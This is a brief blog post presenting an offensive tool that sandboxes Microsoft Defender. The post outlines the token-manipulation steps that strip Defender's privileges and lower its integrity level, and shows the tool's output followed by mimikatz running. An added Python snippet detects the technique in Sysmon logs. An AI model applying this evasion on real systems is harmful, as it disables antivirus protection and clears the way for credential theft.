Offensive Security Tool: Sandbox Defender

by | Feb 11, 2022 | Tools

GitHub Link

Sandbox Defender

This tool, recently written by plackyhacker, lets pentesters and bug bounty hunters demonstrate a flaw that allows attackers to bypass a Windows security mechanism meant to protect anti-malware products from various forms of attack.

The idea and technique behind it: sandboxing Microsoft Defender (and other AV/EDRs) using security token manipulation.


Introduction

The technique is very simple:

  • Enable SeDebugPrivilege in our process security token.
  • Get a handle to Defender using PROCESS_QUERY_LIMITED_INFORMATION.
  • Get a handle to the Defender token using TOKEN_ALL_ACCESS.
  • Disable all privileges in the token using SetPrivilege.
  • Set the Defender token integrity level to Untrusted.
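The detection side of the steps above, as an added example that is not part of the original post or of the tool: a hunt over Sysmon ProcessAccess (Event ID 10) records for untrusted images opening a handle to Defender's engine process. It assumes Sysmon's SourceImage/TargetImage/GrantedAccess fields, assumes the engine process is MsMpEng.exe, and uses constructed sample events; the key point is that the technique only needs PROCESS_QUERY_LIMITED_INFORMATION (0x1000), so a rule that alerts only on high access masks would miss it.

```python
from pathlib import PureWindowsPath

# The only process right the described technique needs (assumption: Sysmon
# reports GrantedAccess as a hex string such as "0x1000").
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Source images expected to touch Defender; an assumed allow-list for the lab.
TRUSTED_SOURCE_DIRS = (
    r"c:\windows\system32",
    r"c:\programdata\microsoft\windows defender",
)

# Assumed Defender engine image; "<version>" is a placeholder path segment.
DEFENDER_IMAGE = r"C:\ProgramData\Microsoft\Windows Defender\Platform\<version>\MsMpEng.exe"

# Constructed sample Event ID 10 records (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": DEFENDER_IMAGE, "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\lab\SandboxDefender.exe",
     "TargetImage": DEFENDER_IMAGE, "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\lab\tool.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1F0FFF"},
]

def is_defender(image: str) -> bool:
    return PureWindowsPath(image).name.lower() == "msmpeng.exe"

def is_trusted_source(image: str) -> bool:
    low = image.lower()
    return any(low.startswith(d) for d in TRUSTED_SOURCE_DIRS)

def suspicious_defender_access(events):
    """Return (source image, mask, limited_only) for every handle an untrusted
    image opened on Defender. The mask is deliberately not a filter: 0x1000
    alone is enough to reach the token, so even the lowest mask is reported."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 10 or not is_defender(ev["TargetImage"]):
            continue
        if is_trusted_source(ev["SourceImage"]):
            continue
        mask = int(ev["GrantedAccess"], 16)
        hits.append((ev["SourceImage"], mask, mask == PROCESS_QUERY_LIMITED_INFORMATION))
    return hits

def run_sample():
    return suspicious_defender_access(SAMPLE_EVENTS)
```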


Example

Execution of the code is shown below (followed by running mimikatz after Defender has been sandboxed):

.\SandboxDefender.exe
[+] Getting a token handle for this process.
[+] Token handle: 0x2EC
[+] Enabling SeDebugPrivilege.
[+] SeDebugPrivilege enabled.
[+] Defender PID: 5212
[+] Getting a process handle for Defender.
[+] Process handle: 0x2F0
[+] Getting a token handle for the Defender process.
[+] Token handle: 0x2F4
[+] Will disable Defender privileges.
[+] Will set Defender Integrity to Untrusted.
[+] Done... Have a nice day!

.\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #


Nice Pictures

This is Defender before the sandboxing (in Process Hacker): [screenshot]

This is Defender after the sandboxing (in Process Hacker): [screenshot]
